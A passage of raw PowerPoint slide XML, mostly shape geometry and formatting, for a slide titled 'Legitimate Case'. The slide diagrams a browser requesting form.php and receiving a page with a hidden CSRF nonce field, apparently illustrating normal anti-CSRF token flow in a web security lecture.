              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6142354" y="2934461"/>
              <a:ext cx="258445" cy="258445"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="258445" h="258444">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3" name="object 23"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2514600" y="2510154"/>
              <a:ext cx="3886200" cy="683260"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="683260">
                  <a:moveTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3679444" y="475995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3627754" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="682751"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="424306"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5190744" y="3467608"/>
            <a:ext cx="1505373" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>GET</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-93" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>form.php</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867437"/>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26" name="object 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3657600" y="3867438"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="513067">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="object 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2492926" y="4370493"/>
            <a:ext cx="6154420" cy="1209040"/>
            <a:chOff x="1869694" y="3277870"/>
            <a:chExt cx="4615815" cy="906780"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869694" y="3414541"/>
              <a:ext cx="4615815" cy="171450"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="149742" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="142620" y="2393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142620" y="168763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149742" y="171156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157019" y="170668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163605" y="167513"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168656" y="161905"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171049" y="154709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170561" y="147395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167405" y="140795"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161798" y="135743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161798" y="35413"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167405" y="30360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170560" y="23760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171049" y="16446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="168656" y="9251"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163605" y="3643"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157019" y="488"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149742" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="108458" y="66528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="37973" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37973" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="69068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="69068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="4615560" y="66528"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="108458" y="66528"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108457" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4615560" y="104628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4615560" y="66528"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="47498" y="69068"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="47498" y="69068"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="4615815" h="171450">
                  <a:moveTo>
                    <a:pt x="75800" y="85578"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="47498" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104103" y="102088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75800" y="85578"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="461581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sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="object 29"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510536" y="3290570"/>
              <a:ext cx="3886200" cy="881380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="881379">
                  <a:moveTo>
                    <a:pt x="3886200" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="881379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3552443" y="881379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="547750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6062979" y="3838321"/>
              <a:ext cx="334010" cy="334010"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="334010" h="334010">
                  <a:moveTo>
                    <a:pt x="333756" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="66802" y="66713"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="333628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333756" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="CDCDCD"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2510536" y="3290570"/>
              <a:ext cx="3886200" cy="881380"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3886200" h="881379">
                  <a:moveTo>
                    <a:pt x="3552443" y="881379"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3619246" y="614464"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="547750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3552443" y="881379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="881379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3886200" y="547750"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="object 32"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4082415" y="3389248"/>
              <a:ext cx="1935480" cy="172720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1935479" h="172720">
                  <a:moveTo>
                    <a:pt x="1935480" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="92964" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92964" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1935480" y="172212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1935480" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3955627" y="4468877"/>
            <a:ext cx="3960707" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;html&gt;&lt;body&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;input</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-47" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>type="hidden"</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="object 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3482341" y="4762838"/>
            <a:ext cx="4911513" cy="230293"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3683635" h="172720">
                <a:moveTo>
                  <a:pt x="3683508" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3406140" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1380744" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="551688" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1380744" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3406140" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3683508" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3683508"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465914" y="4712716"/>
            <a:ext cx="4944533" cy="263320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>name="csrfnonce"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" spc="-33" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>value="av834favcb623"&gt;…</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="object 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652182" y="4762838"/>
            <a:ext cx="4864100" cy="901700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3648075" h="676275">
                <a:moveTo>
                  <a:pt x="1809750" y="337464"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="337464"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="676021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="676021"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1809750" y="337464"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3648075" h="676275">
                <a:moveTo>
                  <a:pt x="3647567" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3556127" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3556127" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3647567" y="172212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3647567" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="object 37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3652180" y="5212792"/>
            <a:ext cx="2413000" cy="361574"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="33020" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="205735">
              <a:spcBef>
                <a:spcPts val="260"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Response</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="object 38"/>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128" y="450638"/>
            <a:ext cx="4804833" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Legitimate</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-53" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-7" dirty="0"/>
              <a:t>Case</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647684" y="3043090"/>
            <a:ext cx="3200400" cy="2866813"/>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4" name="object 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8647684" y="3043089"/>
            <a:ext cx="3200400" cy="504411"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="385D89"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="133773" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="882205">
              <a:spcBef>
                <a:spcPts val="1053"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40"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5" name="object 5"/>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6" name="object 6"/>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7" name="object 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1140528" y="1583181"/>
            <a:ext cx="7207673" cy="3447627"/>
            <a:chOff x="855395" y="1187386"/>
            <a:chExt cx="5405755" cy="2585720"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="855395" y="2848648"/>
              <a:ext cx="507199" cy="507199"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1451863" y="2893237"/>
              <a:ext cx="417906" cy="417906"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="900048" y="3355797"/>
              <a:ext cx="417906" cy="401243"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
